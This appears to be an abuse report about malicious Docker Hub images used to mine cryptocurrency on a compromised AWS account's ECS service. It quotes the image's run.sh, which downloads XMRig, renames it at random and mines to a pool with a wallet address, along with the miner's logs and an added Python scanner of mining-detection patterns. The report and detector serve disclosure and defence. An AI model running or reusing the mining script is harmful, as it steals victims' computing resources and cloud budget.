Hello everyone, I would like to report a malicious image https://hub.docker.com/r/gdus1is/lo (I also see that the account contains one more image, https://hub.docker.com/r/gdus1is/la, which was probably created for the same purpose).
The owner illegally accessed an AWS account, created an extra API key and started using the ECS service to mine cryptocurrency.
I have attached the logs of this image and the run.sh file that is executed when the image is started.
run.sh
APP=app$(shuf -i 1000000-9999999 -n 1)
wget -q https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
tar -zxf xmrig-6.14.1-linux-x64.tar.gz
cd xmrig-6.14.1
mv xmrig $APP
chmod +x $APP
./$APP -a rx/0 -o us.zephyr.herominers.com:1123 -p x -t $(nproc --all) -u ZEPHs8EVgJXb6pqyj5mAc9E8z1Pu6feUYPZMXtprp6oQL8Z7qqQFiPwVv4d3UMuueAhrrcijPkMucWY4DG9aP2XAVZ8YTrNwMhB.gas1
Logs
2024-04-03 17:59:17 ABOUT XMRig/6.14.1 gcc/5.4.0
2024-04-03 17:59:17 LIBS libuv/1.41.0 OpenSSL/1.1.1k hwloc/2.4.1
2024-04-03 17:59:17 HUGE PAGES supported
2024-04-03 17:59:17 1GB PAGES unavailable
2024-04-03 17:59:17 CPU VirtualApple @ 2.50GHz (1) 64-bit AES
2024-04-03 17:59:17 L2:0.0 MB L3:0.0 MB 10C/10T NUMA:1
2024-04-03 17:59:17 MEMORY 1.3/7.7 GB (18%)
2024-04-03 17:59:17 DONATE 1%
2024-04-03 17:59:17 ASSEMBLY auto:intel
2024-04-03 17:59:17 POOL #1 us.zephyr.herominers.com:1123 algo rx/0
2024-04-03 17:59:17 COMMANDS hashrate, pause, resume, results, connection
2024-04-03 17:59:17 OPENCL disabled
2024-04-03 17:59:17 CUDA disabled
2024-04-03 17:59:17 [2024-04-03 17:59:17.772] net use pool us.zephyr.herominers.com:1123 15.204.46.117
2024-04-03 17:59:17 [2024-04-03 17:59:17.776] net new job from us.zephyr.herominers.com:1123 diff 240009 algo rx/0 height 221407
2024-04-03 17:59:17 [2024-04-03 17:59:17.777] cpu use argon2 implementation SSSE3
2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr msr kernel module is not available
2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW
2024-04-03 17:59:17 [2024-04-03 17:59:17.805] randomx init dataset algo rx/0 (10 threads) seed 59789da41f0fcfc7...
2024-04-03 17:59:17 [2024-04-03 17:59:17.809] randomx allocated 2336 MB (2080+256) huge pages 0% 0/1168 +JIT (3 ms)
2024-04-03 17:59:23 [2024-04-03 17:59:23.164] randomx dataset ready (5356 ms)
2024-04-03 17:59:23 [2024-04-03 17:59:23.165] cpu use profile * (10 threads) scratchpad 2048 KB
2024-04-03 17:59:23 [2024-04-03 17:59:23.170] cpu READY threads 10/10 (10) huge pages 0% 0/10 memory 20480 KB (4 ms)
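For defenders who want to catch this kind of image before it burns through ECS capacity, here is an added example (not part of the report above, and not the reporter's code) of a small indicator scanner that runs over an image's entrypoint script and its container stdout logs. The sample script and log lines are constructed to mirror what the report shows, the wallet address is replaced by a placeholder, and the pool-hostname list is an illustrative subset rather than a threat-intelligence feed; the indicator names, weights and threshold are assumptions for this example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    source: str      # where the hit came from: "run.sh" or "log"
    indicator: str   # indicator class name (assumed naming for this example)
    evidence: str    # the matched text
    weight: int      # contribution to the overall score


# Indicator patterns. The pool list is a small illustrative subset, not a
# maintained threat-intel feed; a real detector would load one from a feed.
PATTERNS = [
    ("miner_release_download", 3,
     re.compile(r"github\.com/xmrig/xmrig/releases/\S+", re.I)),
    ("miner_name", 2,
     re.compile(r"\b(?:xmrig|randomx)\b", re.I)),
    ("mining_algo", 2,
     re.compile(r"\b(?:rx/0|rx/wow|cn/r|cn/half|kawpow|ethash)\b", re.I)),
    ("pool_endpoint", 3,
     re.compile(r"\b((?:[a-z0-9-]+\.)*(?:herominers|nanopool|supportxmr|"
                r"hashvault|2miners)\.[a-z]+):(\d{2,5})\b", re.I)),
    ("stratum_url", 3,
     re.compile(r"stratum\+(?:tcp|ssl)://\S+", re.I)),
    # "-o host:port ... -u <long wallet-like token>" on one command line
    ("miner_cli_flags", 2,
     re.compile(r"\s-o\s+\S+:\d+.*\s-u\s+\S{40,}")),
    # miner binary moved to another (often randomized) name before execution
    ("renamed_miner_binary", 2,
     re.compile(r"\bmv\s+\S*xmrig\S*\s+\S+", re.I)),
    # XMRig's own network log lines as they appear in container stdout
    ("xmrig_pool_log", 3,
     re.compile(r"\bnet\s+(?:use pool|new job from)\s+\S+:\d+", re.I)),
]


def scan_text(text: str, source: str) -> list[Finding]:
    """Run every indicator pattern over each line, deduplicating identical hits."""
    seen: set[tuple[str, str]] = set()
    findings: list[Finding] = []
    for line in text.splitlines():
        for name, weight, pattern in PATTERNS:
            for m in pattern.finditer(line):
                key = (name, m.group(0))
                if key in seen:
                    continue
                seen.add(key)
                findings.append(Finding(source, name, m.group(0), weight))
    return findings


def assess(run_sh: str, log_lines: list[str], threshold: int = 5) -> dict:
    """Score an image by the distinct indicator classes hit in its script and logs."""
    findings = scan_text(run_sh, "run.sh") + scan_text("\n".join(log_lines), "log")
    hit = {f.indicator for f in findings}
    # Count each indicator class once, so repeated log lines do not inflate the score.
    score = sum(w for name, w, _ in PATTERNS if name in hit)
    pools = sorted({f.evidence for f in findings if f.indicator == "pool_endpoint"})
    return {
        "verdict": "cryptomining" if score >= threshold else "no mining indicators",
        "score": score,
        "pools": pools,
        "findings": findings,
    }


# Constructed sample inputs mirroring the report; the wallet is a placeholder.
RUN_SH = """APP=app$(shuf -i 1000000-9999999 -n 1)
wget -q https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
tar -zxf xmrig-6.14.1-linux-x64.tar.gz
cd xmrig-6.14.1
mv xmrig $APP
chmod +x $APP
./$APP -a rx/0 -o us.zephyr.herominers.com:1123 -p x -t $(nproc --all) -u ZEPHplaceholderWALLETaddressREPLACEDforTHISexample0000.gas1
"""

LOG_LINES = [
    "2024-04-03 17:59:17 ABOUT XMRig/6.14.1 gcc/5.4.0",
    "2024-04-03 17:59:17 POOL #1 us.zephyr.herominers.com:1123 algo rx/0",
    "2024-04-03 17:59:17 [2024-04-03 17:59:17.772] net use pool us.zephyr.herominers.com:1123 15.204.46.117",
    "2024-04-03 17:59:17 [2024-04-03 17:59:17.776] net new job from us.zephyr.herominers.com:1123 diff 240009 algo rx/0 height 221407",
    "2024-04-03 17:59:23 [2024-04-03 17:59:23.164] randomx dataset ready (5356 ms)",
    "2024-04-03 17:59:30 app listening on port 8080",  # benign line, should not match
]

if __name__ == "__main__":
    result = assess(RUN_SH, LOG_LINES)
    print(result["verdict"], "score", result["score"], "pools", result["pools"])
    for f in result["findings"]:
        print(f"  [{f.source}] {f.indicator}: {f.evidence}")
```

The scanner scores distinct indicator classes rather than raw match counts, so a noisy miner that logs the same pool line every few seconds is weighted the same as a quiet one; the pool endpoint it extracts is what you would hand to the network team for an egress block, and the same patterns apply unchanged to CloudWatch log streams from ECS tasks.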